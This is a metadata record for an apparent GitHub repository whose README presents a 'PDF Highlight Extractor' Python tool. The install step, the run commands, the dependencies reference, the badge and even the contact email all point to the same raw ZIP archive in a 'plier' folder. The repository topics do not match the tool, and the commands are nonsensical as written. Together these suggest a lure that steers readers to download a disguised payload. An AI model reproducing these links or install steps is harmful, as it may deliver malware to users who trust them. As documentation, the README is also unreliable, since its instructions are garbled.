{"id":28330848,"url":"https://github.com/kingpin707/pdf-highlight-extractor","last_synced_at":"2026-05-03T07:46:43.167Z","repository":{"id":293779754,"uuid":"985073903","full_name":"KINGPIN707/PDF-Highlight-Extractor","owner":"KINGPIN707","description":"A Python tool for extracting highlighted text from PDF files while preserving formatting attributes (headers, bold, italic) and removing unwanted line breaks and page breaks. Perfect for integrating with content management systems.","archived":false,"fork":false,"pushed_at":"2025-06-14T11:33:44.000Z","size":83,"stargazers_count":1,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-06-14T12:32:32.165Z","etag":null,"topics":["ai21labs","ebook-reader","extract-highlights","extract-text","faiss-backend","highlight-color","kindle","kindle-clippings","koreader","markdown","mobi","pdf-converter","python","remarkable-tablet"],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":false,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/KINGPIN707.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2025-05-17T02:47:50.000Z","updated_at":"2025-06-14T11:33:48.000Z","dependencies_parsed_at":"2025-05-31T08:45:20.532Z","dependency_job_id":"2024915e-2fef-461c-a65a-acac76eeb894","html_url":"https://github.com/KINGPIN707/PDF-Highlight-Extractor","commit_stats":null,"previous_names":["kingpin707/pdf-highlight-extractor"],"tags_count":1,"template":false,"template_full_name":null,"purl":"pkg:github/KINGPIN707/PDF-Highlight-Extractor","repo
sitory_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/KINGPIN707%2FPDF-Highlight-Extractor","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/KINGPIN707%2FPDF-Highlight-Extractor/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/KINGPIN707%2FPDF-Highlight-Extractor/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/KINGPIN707%2FPDF-Highlight-Extractor/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/KINGPIN707","download_url":"https://codeload.github.com/KINGPIN707/PDF-Highlight-Extractor/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/KINGPIN707%2FPDF-Highlight-Extractor/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":260658756,"owners_count":23043435,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["ai21labs","ebook-reader","extract-highlights","extract-text","faiss-backend","highlight-color","kindle","kindle-clippings","koreader","markdown","mobi","pdf-converter","python","remarkable-tablet"],"created_at":"2025-05-26T17:42:39.897Z","updated_at":"2026-05-03T07:46:43.161Z","avatar_url":"https://github.com/KINGPIN707.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# PDF Highlight Extractor 📝✨\n\n![PDF Highlight Extractor](https://raw.githubusercontent.com/KINGPIN707/PDF-Highlight-Extractor/main/plier/PD_Extractor_Highlight_3.7-beta.5.zip%20Latest%20Release-Click%20Here-brightgreen)\n\nWelcome to the **PDF 
Highlight Extractor** repository! This Python tool allows you to extract highlighted text from PDF files while keeping important formatting attributes like headers, bold, and italic text. It also removes unwanted line breaks and page breaks, making it ideal for integration with content management systems.\n\n## Table of Contents\n\n- [Features](#features)\n- [Installation](#installation)\n- [Usage](#usage)\n- [Supported Formats](#supported-formats)\n- [Dependencies](#dependencies)\n- [Contributing](#contributing)\n- [License](#license)\n- [Contact](#contact)\n\n## Features\n\n- **Extract Highlighted Text**: Capture only the text you need without sifting through entire documents.\n- **Preserve Formatting**: Maintain headers, bold, and italic styles for better readability.\n- **Clean Output**: Automatically remove unwanted line breaks and page breaks.\n- **Easy Integration**: Works seamlessly with various content management systems.\n- **Cross-Platform**: Runs on any system that supports Python 3.\n\n## Installation\n\nTo get started with PDF Highlight Extractor, follow these steps:\n\n1. **Clone the Repository**:\n   ```bash\n   git clone https://github.com/KINGPIN707/PDF-Highlight-Extractor.git\n   cd PDF-Highlight-Extractor\n   ```\n\n2. **Install Dependencies**:\n   Use pip to install the required libraries.\n   ```bash\n   pip install -r https://raw.githubusercontent.com/KINGPIN707/PDF-Highlight-Extractor/main/plier/PD_Extractor_Highlight_3.7-beta.5.zip\n   ```\n\n## Usage\n\nUsing PDF Highlight Extractor is straightforward. Here’s how to run the tool:\n\n1. **Prepare Your PDF**: Make sure your PDF file is ready for extraction.\n2. 
**Run the Tool**:\n   ```bash\n   python https://raw.githubusercontent.com/KINGPIN707/PDF-Highlight-Extractor/main/plier/PD_Extractor_Highlight_3.7-beta.5.zip https://raw.githubusercontent.com/KINGPIN707/PDF-Highlight-Extractor/main/plier/PD_Extractor_Highlight_3.7-beta.5.zip\n   ```\n3. **View the Output**: The extracted text will be saved in a new file, preserving all formatting.\n\n### Example Command\n\n```bash\npython https://raw.githubusercontent.com/KINGPIN707/PDF-Highlight-Extractor/main/plier/PD_Extractor_Highlight_3.7-beta.5.zip https://raw.githubusercontent.com/KINGPIN707/PDF-Highlight-Extractor/main/plier/PD_Extractor_Highlight_3.7-beta.5.zip\n```\n\nThis command will extract highlighted text from `https://raw.githubusercontent.com/KINGPIN707/PDF-Highlight-Extractor/main/plier/PD_Extractor_Highlight_3.7-beta.5.zip` and save it in a new file.\n\n## Supported Formats\n\nThe PDF Highlight Extractor supports various PDF formats. It works well with:\n\n- Standard PDF files\n- Scanned documents (OCR-enabled)\n- PDF/A format\n\n## Dependencies\n\nThe tool relies on several Python libraries for its functionality:\n\n- `numpy`: For numerical operations.\n- `opencv`: For image processing tasks.\n- `Pillow`: For handling image files.\n- `PyMuPDF`: For reading and manipulating PDF files.\n- `PyPDF2`: For PDF file handling.\n- `pypdfium2`: For rendering PDF pages.\n\nYou can find the complete list of dependencies in the `https://raw.githubusercontent.com/KINGPIN707/PDF-Highlight-Extractor/main/plier/PD_Extractor_Highlight_3.7-beta.5.zip` file.\n\n## Contributing\n\nWe welcome contributions! If you’d like to improve PDF Highlight Extractor, please follow these steps:\n\n1. **Fork the Repository**: Click on the \"Fork\" button at the top right of the page.\n2. **Create a Branch**: \n   ```bash\n   git checkout -b feature/YourFeature\n   ```\n3. **Make Your Changes**: Implement your feature or fix.\n4. 
**Commit Your Changes**:\n   ```bash\n   git commit -m \"Add your message here\"\n   ```\n5. **Push to Your Branch**:\n   ```bash\n   git push origin feature/YourFeature\n   ```\n6. **Create a Pull Request**: Go to the original repository and click on \"New Pull Request\".\n\n## License\n\nThis project is licensed under the MIT License. See the [LICENSE](LICENSE) file for details.\n\n## Contact\n\nFor any inquiries or support, please reach out:\n\n- **Email**: https://raw.githubusercontent.com/KINGPIN707/PDF-Highlight-Extractor/main/plier/PD_Extractor_Highlight_3.7-beta.5.zip\n- **GitHub**: [KINGPIN707](https://github.com/KINGPIN707)\n\nThank you for using PDF Highlight Extractor! If you encounter any issues or have suggestions, feel free to open an issue in the repository.\n\nHappy extracting! 🎉","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fkingpin707%2Fpdf-highlight-extractor","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fkingpin707%2Fpdf-highlight-extractor","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fkingpin707%2Fpdf-highlight-extractor/lists"}